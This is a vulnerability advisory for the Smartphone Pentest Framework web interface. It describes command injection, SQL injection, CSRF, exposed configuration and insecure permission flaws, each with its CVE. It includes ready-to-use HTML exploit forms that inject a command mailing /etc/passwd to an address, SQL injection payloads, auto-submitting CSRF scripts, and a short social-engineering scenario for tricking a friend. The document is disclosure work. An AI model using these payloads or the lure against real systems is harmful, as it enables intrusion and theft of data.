Multiple Vulnerabilities in Smartphone Pentest Framework (SPF)

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester’s machine. The research was inspired by the vulnerability found by Jon Passki
(http://osvdb.org/85873).
Even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for many pentesters) the vulnerabilities can still be easily exploited via the local/internal network, or even from remote via CSRF vector. In default installation of SPF the web server port and GUI application’s path are easily predictable (localhost:80/frameworkgui/).

1. Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5693
   Multiple Perl scripts in the “/frameworkgui/” directory do not perform sanitation of user-supplied input passed as argument to the system() function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server.
   Vulnerable scripts and parameters:
   - remoteAttack.pl:
   “ipAddressTB” HTTP POST parameter.
   - CSAttack.pl:
   “hostingPath”, “filename” and “phNo2Attack” HTTP POST parameters.
   - SEAttack.pl:
   “hostingPath”, “platformDD2”, “fileName” and “phNo2Attack” HTTP POST parameters.
   - attach2agents.pl:
   “agentURLPath” and “agentControlKey” HTTP POST parameters.
   - attachMobileModem.pl:
   “appURLPath” and “controlKey” HTTP POST parameters.
   - guessPassword.pl:
   “ipAddressTB” HTTP POST parameter.
   PoCs (Proof-of-Concept) below will send “/etc/passwd” file to the “user@host” email address:
   <form action=“http://[host]/remoteAttack.pl” method=“post”>
   <input type=“hidden” name=“ipAddressTB” value=’ & cat /etc/passwd | mail user@host’ />
   <input type=“submit” id=“btn”>
   </form>
   <form action=“http://[host]/frameworkgui/CSAttack.pl” method=“post”>
   <input type=“hidden” name=“hostingPath” value=’ & cat /etc/passwd | mail user@host’ />
   <input type=“submit” id=“btn”>
   </form>
   <form action=“http://[host]/frameworkgui/SEAttack.pl” method=“post”>
   <input type=“hidden” name=“hostingPath” value=’ & cat /etc/passwd | mail user@host’ />
   <input type=“submit” id=“btn”>
   </form>
   <form action=“http://[host]/frameworkgui/attach2agents.pl” method=“post”>
   <input type=“hidden” name=“agentURLPath” value=’ & cat /etc/passwd | mail user@host’ />
   <input type=“submit” id=“btn”>
   </form>
   <form action=“http://[host]/frameworkgui/attachMobileModem.pl” method=“post”>
   <input type=“hidden” name=“appURLPath” value=’ & cat /etc/passwd | mail user@host’ />
   <input type=“submit” id=“btn”>
   </form>
   <form action=“http://[host]/frameworkgui/guessPassword.pl” method=“post”>
   <input type=“hidden” name=“ipAddressTB” value=’ & cat /etc/passwd | mail user@host’ />
   <input type=“submit” id=“btn”>
   </form>
   All of the above-mentioned vulnerabilities can be exploited via CSRF vector. The PoC below sends “/etc/passwd” file to the “user@host” email address as soon as victim [that has open SPF GUI in one tab of a browser] visits a malicious web page with CSRF exploit:
   <form action=“http://localhost/frameworkgui/guessPassword.pl” method=“post” name=f1>
   <input type=“hidden” name=“ipAddressTB” value=’ & cat /etc/passwd | mail user@host’ />
   <input type=“submit” id=“btn”>
   </form>
   <script>
   document.f1.Submit()
   </script>

2. Multiple SQL Injections in Smartphone Pentest Framework (SPF): CVE-2012-5694
   Multiple Perl scripts in the “/frameworkgui/” directory are vulnerable to SQL injections. A remote attacker can execute arbitrary SQL commands in application’s database.
   Vulnerable scripts and parameters:
   - attach2Agents.pl:
   “agentPhNo”, “controlPhNo”, “agentURLPath”, “agentControlKey” and “platformDD1” HTTP POST parameters.
   - attachMobileModem.pl:
   “modemPhoneNo”, “controlKey” and “appURLPath” HTTP POST parameters.
   - escalatePrivileges.pl:
   “agentsDD” and “modemNoDD” HTTP POST parameters.
   - getContacts.pl:
   “agentsDD” and “modemNoDD” HTTP POST parameters.
   - getDatabase.pl:
   “agentsDD” and “modemNoDD” HTTP POST parameters.
   - SEAttack.pl:
   “modemNoDD” HTTP POST parameter
   - sendSMS.pl:
   “agentsDD” and “modemNoDD” HTTP POST parameters.
   - takePic.pl:
   “agentsDD” and “modemNoDD” HTTP POST parameters.
   - CSAttack.pl:
   “modemNoDD2” HTTP POST parameter.
   The following PoC is available:
   <form action=“http://[host]/frameworkgui/attach2Agents.pl” method=“post”>
   <input type=“hidden” name=“agentPhNo” value=“-1 UNION SELECT version() INTO OUTFILE ‘/tmp/file.txt’” />
   <input type=“submit” id=“btn”>
   </form>
   All the above-mentioned SQL injections can also be exploited via CSRF vector:
   <form action=“http://localhost/cgi-bin/frameworkgui/attach2Agents.pl” method=“post” name=f1>
   <input type=“hidden” name=“agentPhNo” value=“-1 UNION SELECT version() INTO OUTFILE ‘file.txt’” />
   <input type=“submit” id=“btn”>
   </form>
   <script>
   document.f1.Submit();
   </script>

3. Cross-Site Request Forgery in Smartphone Pentest Framework (SPF): CVE-2012-5695
   The vulnerability exists due to insufficient verification of the HTTP requests origin in all Perl scripts within the “/frameworkgui/” directory. A remote attacker without direct access to application’s web interface can perform cross-site request forgery attacks and execute arbitrary actions available to application’s users only (e.g. send SMS messages).
   However, in our case the most practical usage of the CSRF vulnerabilities is to exploit OS command injection and SQL injection vulnerabilities described in sections 1) and 2) of this advisory.
   A Social Engineering attack scenario may be quite simple:
   Step 1: Send link to your friend to “a brilliant pentester’s framework”.
   Step 2: The majority of people will make a default installation of the SPF.
   Step 3: Send link to “SPF practical usage” manual with CSRF exploit to your friend.
   Step 4: With a bit of luck you can execute arbitrary commands on your friend’s machine.

4. Improper Access Control in Smartphone Pentest Framework (SPF): CVE-2012-5696
   The weakness exists due to insufficient ACL to the “config” file located in “/frameworkgui/” directory. A remote attacker can access the configuration file directly and obtain sensitive information, such as database password that is stored in plaintext.
   PoC:
   http://[host]/frameworkgui/config

5. Incorrect Default Permissions in Smartphone Pentest Framework (SPF): CVE-2012-5697
   The weakness exists because of “btinstall” installation script that sets world-writable permissions for all files within the “/frameworkgui/” directory:
   cd /var/www/frameworkgui; chmod 777 * ;
   A local unprivileged user can read and modify arbitrary files located within this directory.
   Further exploitation of this vulnerability might allow an attacker to place or inject into existing Perl scripts a backdoor and even gain full control over the system under certain conditions.